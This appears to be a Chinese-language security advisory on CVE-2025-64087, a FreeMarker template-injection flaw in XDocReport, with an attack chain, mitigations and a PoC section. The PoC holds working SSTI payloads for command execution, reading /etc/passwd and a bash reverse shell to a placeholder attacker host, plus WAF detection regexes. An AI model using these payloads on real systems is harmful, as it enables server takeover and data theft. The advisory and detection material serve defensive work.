CVE-2025-64087 | XDocReport FreeMarker SSTI远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-64087

漏洞类型

服务器端模板注入(SSTI) / 远程代码执行(RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

opensagres XDocReport (FreeMarker组件)

漏洞概述

CVE-2025-64087是opensagres XDocReport项目中一个严重的服务器端模板注入(SSTI)漏洞。该漏洞存在于XDocReport的FreeMarker模板引擎组件中，影响版本从v1.0.0到v2.1.0。攻击者可以通过在模板中注入精心构造的恶意表达式来绕过FreeMarker的安全限制，进而执行任意代码。由于该漏洞的CVSS评分高达9.8，属于严重级别，且攻击向量为网络方式，无需任何认证和用户交互即可利用，因此对使用该组件的应用程序构成极大威胁。XDocReport是一个流行的Java库，用于从Office文档和PDF模板生成报告，被许多企业应用广泛使用。该漏洞的披露引发了安全社区的广泛关注，官方已在GitHub上发布了修复补丁(PR #705)。

技术细节

该漏洞的根本原因在于XDocReport的FreeMarker组件未能正确过滤用户输入的模板内容。FreeMarker是一个强大的Java模板引擎，支持通过${...}语法插入动态内容。攻击者可以利用FreeMarker的内置函数和对象访问机制，构造恶意payload来访问危险类和方法。典型的攻击手法包括：1) 利用${完全限定类名?new()}<#assign ex='freemarker.template.utility.Execute'?new()>${ex('命令')}模式创建任意对象；2) 通过${.data_model['xxx']}访问数据模型；3) 利用${.globals}获取全局变量。在XDocReport的文档转换流程中，当用户提交的模板内容未经充分消毒就被传递给FreeMarker处理时，攻击者可以注入上述恶意表达式。由于FreeMarker默认配置下允许访问java.lang.Process等危险类，攻击者可以执行系统命令、读取敏感文件甚至建立后门连接。修复方案需要在模板处理前实施输入验证，或限制FreeMarker的Sandbox配置以禁用危险内置函数。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标应用是否使用opensagres XDocReport库处理用户提交的文档模板

STEP 2

步骤2

构造恶意payload：攻击者精心构造包含FreeMarker模板表达式的恶意输入，如${('freemarker.template.utility.Execute'?new())('id')}

STEP 3

步骤3

注入点识别：找到未经过滤的用户输入字段，该字段内容会被传递到FreeMarker引擎进行模板渲染

STEP 4

步骤4

模板注入：攻击者将恶意FreeMarker表达式注入到文档模板的变量位置，绕过服务器端渲染

STEP 5

步骤5

代码执行：FreeMarker解析并执行恶意表达式，利用freemarker.template.utility.Execute类或类似机制在服务器上执行系统命令

STEP 6

步骤6

持久化控制：攻击者可能部署后门、窃取数据或横向移动，进一步扩大攻击效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64087 PoC - XDocReport FreeMarker SSTI
# Attack payload to execute arbitrary system commands

# Payload 1: Basic command execution via FreeMarker Execute class
payload_rce = '''${("freemarker.template.utility.Execute"?new())("whoami")}'''

# Payload 2: Read /etc/passwd file
payload_read = '''${(org.apache.commons.io.FileUtils?new().readFileToString("/etc/passwd"))}'''

# Payload 3: Reverse shell connection
payload_shell = '''${("freemarker.template.utility.Execute"?new())("bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1")}'''

# Payload 4: Using object construction chain
payload_chain = '''<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}'''

# Exploit scenario in XDocReport context:
def exploit_xdocreport(target_url, template_input):
    """
    Simulate exploitation of XDocReport SSTI vulnerability
    """
    malicious_template = f"""
    Document Title: ${{document_title}}
    Content: {payload_rce}
    """
    # The template is processed by FreeMarker without sanitization
    # Result: Command execution on the server
    return malicious_template

# Detection pattern for WAF/IDS:
detection_patterns = [
    r'\$\{.*freemarker.*\}',
    r'\$\{.*\.new\(\).*\}',
    r'\$\{.*utility\.Execute.*\}',
    r'<#assign.*new\(\)\s*>',
    r'\$\{.*\.data_model.*\}'
]

print("[+] CVE-2025-64087 PoC Generated")
print("[*] Target: opensagres XDocReport v1.0.0 - v2.1.0")
print("[*] Vulnerability: FreeMarker SSTI -> RCE")

影响范围

opensagres XDocReport v1.0.0

opensagres XDocReport v1.1.0

opensagres XDocReport v1.2.0

opensagres XDocReport v2.0.0

opensagres XDocReport v2.1.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)中配置规则，检测并阻止包含${...}、<#assign...>等FreeMarker特征的请求；2) 在代码层面实施输入消毒，对所有模板变量进行HTML实体编码转义；3) 限制FreeMarker的ObjectWrapper配置，使用SimpleObjectWrapper替代默认配置以减少可访问的Java类；4) 实施网络层隔离，限制运行XDocReport服务的服务器的网络访问权限；5) 启用应用日志监控，及时发现可疑的模板注入行为。但请注意，这些措施仅为临时解决方案，强烈建议尽快应用官方安全补丁进行彻底修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-64087
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-64087
3 Details https://www.cvedetails.com/cve/CVE-2025-64087/
4 VulDB https://vuldb.com/cve/CVE-2025-64087
5 Link https://github.com/AT190510-Cuong/CVE-2025-64087-SSTI-
6 Link https://github.com/opensagres/xdocreport
7 Link https://github.com/opensagres/xdocreport/pull/705
8 Link https://hackmd.io/@cuongnh/BJEnw7SAlg
9 Link https://hackmd.io/@cuongnh/SkQvhEf0lx